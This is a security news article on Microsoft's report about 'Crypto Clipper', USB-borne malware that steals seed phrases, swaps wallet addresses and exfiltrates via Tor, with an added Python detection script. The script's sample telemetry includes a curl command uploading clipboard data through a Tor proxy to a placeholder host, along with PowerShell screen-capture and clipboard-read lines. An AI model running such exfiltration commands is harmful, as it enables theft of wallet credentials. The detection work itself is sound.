Microsoft says a new strain of USB malware is moving through removable drives and targeting cryptocurrency wallets, not by brute force but by quietly watching the clipboard, grabbing screenshots, and sending stolen data off through Tor. The company says the threat, dubbed Crypto Clipper, can also swap wallet addresses, which is the kind of tiny, nasty trick that turns a simple copy-paste into a payment to the wrong person.
The method is old-school in one sense and very current in another: removable media still gets people, while Tor and proxy chaining make the exfiltration harder to trace. That combination is a reminder that attackers do not need fancy exploits if they can sneak code onto a machine through a file people still trust far too much.
How Crypto Clipper spreads through .lnk files
According to Microsoft, the malware arrives on USB drives in .lnk files. Those shortcut files contain executable code that checks whether the malicious software is already present on the computer when the drive is plugged in; if not, the payload is loaded through Tor. To stay hidden, it also scans the drive and gives .lnk files lookalike names.
That approach is low-tech enough to be annoying and effective enough to matter. USB-based infections never really disappeared, especially in places where removable media still moves between offices, labs, and home machines with very little scrutiny.
Clipboard monitoring and wallet replacement
Crypto Clipper watches the clipboard for patterns that match standardized 12-word or 24-word seed phrases used to generate wallet private keys. When it finds a match, it sends the data and five screenshots captured over ten seconds to an external server. It can also replace cryptocurrency wallet addresses in transit, redirecting payments toward attacker-controlled wallets.
- Clipboard checks for 12-word and 24-word seed phrases
- Five screenshots taken within ten seconds after detection
- Wallet address swapping to redirect payments
- Data sent through Tor using a local SOCKS5 proxy
Microsoft says the malware does not rely on a traditional installer or exposed IP-based command-and-control infrastructure. Instead, it runs a portable Tor client and routes traffic through a local SOCKS5 proxy, which makes the operation harder to pin down and turns the stealer into something closer to a lightweight backdoor.
What Microsoft Defender looks for
Microsoft Defender for Endpoint reportedly flags parts of the malware as suspicious JavaScript processes and possible data leakage through curl. Microsoft Defender labels the threat as Trojan:Win32/CryptoBandits.A.
Signs of infection include script interpreter launches tied to suspicious processes, use of a proxy on localhost:9050, PowerShell screen-capture commands, and signs that the clipboard is being checked or wallet addresses are being altered. If that combination shows up together, the machine is probably not having a good day.
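As an added example (not part of Microsoft's write-up), a small Python correlation over constructed endpoint telemetry that looks for the indicator combination listed above and flags a host only when several co-occur; the event field names, the sample command lines and the non-C: drive-letter heuristic for removable media are assumptions.

```python
import re
from collections import defaultdict
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry (process-creation and network events), not real logs.
EVENTS = [
    {"host": "ws01", "type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe //B "E:\Documents.vbs"'},  # script host run from a removable drive
    {"host": "ws01", "type": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl.exe -x socks5h://127.0.0.1:9050 -T clip.txt http://EXFIL_PLACEHOLDER/"},
    {"host": "ws01", "type": "process", "image": PS,
     "cmd": "powershell.exe -w hidden -c ... System.Drawing ... CopyFromScreen ..."},
    {"host": "ws01", "type": "process", "image": PS, "cmd": "powershell.exe -c Get-Clipboard"},
    {"host": "ws01", "type": "network", "dst": "127.0.0.1", "dport": 9050},
    {"host": "ws02", "type": "process", "image": PS,
     "cmd": r"powershell.exe -File C:\Scripts\backup.ps1"},  # routine admin activity
    {"host": "ws02", "type": "network", "dst": "10.0.0.5", "dport": 443},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# Heuristic (assumption): a non-C: drive letter in the command line suggests removable media.
REMOVABLE_DRIVE = re.compile(r"\b[D-Z]:\\", re.I)
TOR_SOCKS = re.compile(r"socks5h?://(127\.0\.0\.1|localhost):9050", re.I)

def indicators(event):
    # Return the indicator names a single event matches.
    hits = set()
    if event["type"] == "network":
        if event["dst"] in ("127.0.0.1", "::1") and event["dport"] == 9050:
            hits.add("tor_socks_9050")
        return hits
    image, cmd = event["image"].lower().rsplit("\\", 1)[-1], event["cmd"]
    if image in SCRIPT_HOSTS and REMOVABLE_DRIVE.search(cmd):
        hits.add("script_host_from_removable_drive")
    if TOR_SOCKS.search(cmd):
        hits.add("tor_socks_9050")
    if image == "powershell.exe" and "copyfromscreen" in cmd.lower():
        hits.add("powershell_screen_capture")
    if image == "powershell.exe" and "get-clipboard" in cmd.lower():
        hits.add("powershell_clipboard_read")
    return hits

def score_hosts(events):
    # Union indicators per host: the combination, not any single event, drives the alert.
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= indicators(ev)
    return dict(per_host)

def flagged_hosts(events, min_indicators=3):
    # Hosts on which at least min_indicators distinct indicators co-occur.
    return sorted(h for h, hits in score_hosts(events).items() if len(hits) >= min_indicators)
```

Any one of these signals alone (a PowerShell clipboard read, a local SOCKS port) is common on healthy machines, so the threshold is what keeps the rule from drowning analysts in noise.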
Why Crypto Clipper matters for crypto wallet security
The interesting part is not just the theft, but the packaging. By blending credential theft, screen capture, clipboard abuse, and remote execution into one tool, Crypto Clipper follows a trend that security teams have been warning about for a while: commodity malware that behaves like a modular platform. Expect copycat campaigns to keep borrowing the same formula as long as crypto wallets stay attractive and USB hygiene stays sloppy.